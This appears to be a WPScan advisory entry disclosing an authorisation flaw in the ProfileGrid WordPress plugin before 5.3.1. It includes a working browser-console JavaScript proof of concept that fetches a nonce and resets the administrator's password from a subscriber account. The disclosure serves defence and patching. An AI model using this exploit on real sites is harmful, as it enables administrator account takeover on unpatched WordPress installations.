WordPress Plugin Vulnerabilities
ProfileGrid < 5.3.1 - Subscriber+ Arbitrary Password Reset
Description
The plugin provides an AJAX endpoint for resetting a user password but does not implement proper authorization. This allows a user with low privileges, such as subscriber, to change the password of any account, including Administrator ones.
Proof of Concept
1. Create an administrator account and a subscriber account. If the administrator account ID is not 1, change the `user_id` field accordingly in the code below.
2. Sign in as the subscriber user, and run the following code in your browser console. This will change the administrator's account password to well_nice
// The first request is required to obtain the password reset nonce.
fetch(
'/wp-admin/admin-ajax.php',
{
method:'POST',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: 'action=pm_edit_group_popup_html&tab=member&type=reset_password'
}
).then(
rsp => {
if ( ! rsp.ok ) {
alert( 'Failed to fetch reset nonce' )
} else{
return rsp.text();
}
}
).then(
data => {
// Extracts the nonce from the first request
nonceString='name="_wpnonce" value="';
nonceStart= data.indexOf( nonceString )+nonceString.length;
nonce = data.substring( nonceStart, nonceStart+10 );
// Sends the password reset request
fetch(
'/wp-admin/admin-ajax.php',
{
method: 'POST',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: 'action=pm_reset_user_password&_wpnonce=' + nonce + '&user_id=1&pm_new_pass=well_nice'
}
).then(
rsp => {
if ( ! rsp.ok ) {
alert( 'Failed to reset password' );
} else {
return rsp.text();
}
}
).then(
data => {
console.log( data );
}
)
}
);
Affects Plugins
Fixed in 5.3.1 References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-02-27 (about 1 years ago)
Added
2023-02-27 (about 1 years ago)
Last Updated
2023-02-27 (about 1 years ago)
WPScan 